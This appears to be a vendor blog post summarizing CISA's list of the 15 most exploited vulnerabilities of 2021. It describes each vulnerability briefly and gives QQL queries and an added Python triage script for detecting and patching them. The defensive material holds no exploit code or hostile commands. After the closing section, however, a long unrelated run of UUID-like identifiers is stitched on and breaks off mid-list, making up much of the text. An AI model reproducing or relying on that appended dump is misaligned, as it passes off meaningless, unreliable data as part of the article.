_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._
The Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.
To that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.
Of special interest in the report is this key finding by CISA:
_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._
### CISA’s Top 15 Routinely Exploited Vulnerabilities of 2021
The 15 vulnerabilities most routinely exploited in 2021, as observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K., are:
CVE| Vulnerability Name| Vendor and Product| Type
---|---|---|---
[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE)
[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE
[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege
[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE
[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass
[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE
[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE
[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE
[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE
[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution
[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE
[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE
[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading
[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal
### Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Based on the analysis of this report by the Qualys Research Team, let’s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.
#### Log4Shell Vulnerability
The Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted string to a vulnerable Log4j logging call, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products embedded Log4j and were therefore vulnerable to Log4Shell exploitation.
Visit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.
#### ProxyShell: Multiple Vulnerabilities
The set of vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affects Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and escalate privileges.
#### ProxyLogon: Multiple Vulnerabilities
The set of vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affects Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.
[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.
#### Confluence Server and Data Center Vulnerability
An Object-Graph Navigation Language (OGNL) injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.
#### Top Vulnerabilities of 2020 Persist
Three additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.
### How Can Qualys Help?
The Qualys Research Team stays on top of CISA’s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.
#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR
[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities, which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.
Using VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.
Use this QQL statement:

```
vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]
```

View vulnerabilities by severity in Qualys VMDR
Qualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.
Dashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited
Qualys Unified Dashboard
#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR
Qualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company’s internet-facing assets. To do so, apply the tag “Internet Facing Assets” in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.
Use this QQL statement:

```
vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]
```
Prioritizing vulnerabilities for remediation in Qualys VMDR
#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR
Qualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.
To view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.
Using Qualys Patch Management to apply patches
Qualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.
To get a view of all available patches for CISA’s top 15 exploited vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:

```
cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]
```
Viewing available patches in Qualys Patch Management
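The detect, prioritize and remediate steps above all revolve around the same 15 CVEs. As an added example (not Qualys code), the script below maps a detection export against that list, counts each chained vulnerability (ProxyShell, ProxyLogon) as one issue, puts assets carrying the post's internet-facing tags first, and renders the QQL statements for the VMDR and Patch Management views; the detection records are constructed stand-ins for a real export.

```python
"""Triage a detection export against CISA's 2021 top-15 list (AA22-117A)
and emit the matching QQL statements. Added example, not Qualys code."""
from collections import defaultdict

# CVE -> (vulnerability name or None, vendor/product), in the order the
# CISA report and the blog post list them.
CISA_2021_TOP15 = {
    "CVE-2021-44228": ("Log4Shell", "Apache Log4j"),
    "CVE-2021-40539": (None, "Zoho ManageEngine AD SelfService Plus"),
    "CVE-2021-34523": ("ProxyShell", "Microsoft Exchange Server"),
    "CVE-2021-34473": ("ProxyShell", "Microsoft Exchange Server"),
    "CVE-2021-31207": ("ProxyShell", "Microsoft Exchange Server"),
    "CVE-2021-27065": ("ProxyLogon", "Microsoft Exchange Server"),
    "CVE-2021-26858": ("ProxyLogon", "Microsoft Exchange Server"),
    "CVE-2021-26857": ("ProxyLogon", "Microsoft Exchange Server"),
    "CVE-2021-26855": ("ProxyLogon", "Microsoft Exchange Server"),
    "CVE-2021-26084": (None, "Atlassian Confluence Server and Data Center"),
    "CVE-2021-21972": (None, "VMware vSphere Client"),
    "CVE-2020-1472": ("ZeroLogon", "Microsoft Netlogon Remote Protocol (MS-NRPC)"),
    "CVE-2020-0688": (None, "Microsoft Exchange Server"),
    "CVE-2019-11510": (None, "Pulse Secure Pulse Connect Secure"),
    "CVE-2018-13379": (None, "Fortinet FortiOS and FortiProxy"),
}

# Asset tags the post suggests for scoping prioritization to exposed assets.
EXPOSED_TAGS = {"Internet Facing Assets", "Cloud Environments",
                "Web Servers", "VMDR-Web Servers"}

# Constructed stand-in for a VMDR detection export (asset, tags, CVEs found).
# "CVE-0000-0000" is a placeholder for any CVE that is not on the CISA list.
SAMPLE_DETECTIONS = [
    {"asset": "exch-01", "tags": ["Internet Facing Assets", "Type: Servers"],
     "cves": ["CVE-2021-26855", "CVE-2021-27065", "CVE-2021-34473",
              "CVE-2021-31207", "CVE-2021-34523"]},
    {"asset": "dc-01", "tags": ["Type: Servers"],
     "cves": ["CVE-2020-1472", "CVE-0000-0000"]},
    {"asset": "app-07", "tags": ["Web Servers", "Cloud Environments"],
     "cves": ["CVE-2021-44228"]},
    {"asset": "laptop-42", "tags": [], "cves": ["CVE-0000-0000"]},
]


def build_qql(field, cves):
    """Render a QQL list filter in the form the post uses; QQL wraps
    exact-match values in backticks, so each CVE is quoted that way."""
    values = ", ".join(f"`{cve}`" for cve in cves)
    return f"{field}:[{values}]"


def triage(detections):
    """Keep only assets with at least one top-15 CVE and rank them.

    A chained vulnerability (ProxyShell, ProxyLogon) is one issue however
    many of its CVEs were detected. Exposed assets sort first, then assets
    with more distinct issues, then by name for a stable order.
    """
    rows = []
    for det in detections:
        hits = {c for c in det["cves"] if c in CISA_2021_TOP15}
        if not hits:
            continue
        issues = defaultdict(set)
        for cve in hits:
            name, _product = CISA_2021_TOP15[cve]
            issues[name or cve].add(cve)
        rows.append({
            "asset": det["asset"],
            "exposed": bool(EXPOSED_TAGS & set(det.get("tags", []))),
            "issues": {name: sorted(cves) for name, cves in issues.items()},
            "cves": sorted(hits),
        })
    rows.sort(key=lambda r: (not r["exposed"], -len(r["issues"]), r["asset"]))
    return rows


def remediation_queries(rows):
    """QQL statements narrowed to the top-15 CVEs actually detected: one for
    the VMDR vulnerabilities view, one for the Patch Management Patches tab."""
    seen = sorted({c for r in rows for c in r["cves"]})
    return {
        "vmdr": build_qql("vulnerabilities.vulnerability.cveIds", seen),
        "patch_management": build_qql("cve", seen),
    }


if __name__ == "__main__":
    ranked = triage(SAMPLE_DETECTIONS)
    for row in ranked:
        flag = "EXPOSED" if row["exposed"] else "internal"
        summary = "; ".join(f"{n} ({len(c)} CVE)" for n, c in row["issues"].items())
        print(f"{row['asset']:<10} {flag:<8} {summary}")
    for view, query in remediation_queries(ranked).items():
        print(f"\n{view}:\n{query}")
```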
For additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.
### Getting Started
Ready to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.
"21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "2255B39F-1B91-56F4-A323-8704808620D3", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "256984DC-A742-53F8-889F-2071EC134734", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "3019C843-FE2F-527C-B7C1-14A1C3066721", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31DB22CD-3492-524F-9D26-035FC1086A71", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "35B21CE7-1E51-5824-B70E-36480A6E8763", "371D4A15-51B5-520B-B31D-856E557695FD", 
"3734D8ED-657E-5585-B181-DE9BE2D84456", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "39EADA2B-CE50-555B-910E-D3B77640C464", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3F400483-1F7E-5BE5-8612-4D55D450D553", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4987606C-EB9B-581F-913D-36468DE9160E", "49EC151F-12F0-59CF-960C-25BD54F46680", 
"4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AC49DB9-A784-561B-BF92-94209310B51B", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", 
"5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "626E6774-0ACC-594C-BB61-E89F8F034B11", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "64EF6553-4D22-526B-A1CC-09212DBD7625", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "70EDCB3B-9053-5056-980C-AC3123913F04", 
"71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "7395180E-85B1-5253-9975-F93BE4693139", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "7758268F-2004-536A-B51F-62DA1E5A992D", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "84D5F04A-0DDB-5788-8759-DA99D303B756", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8C937DCD-4090-5A44-9361-4D9ECF545843", 
"8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "939F3BE7-AF69-5351-BD56-12412FA184C5", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", 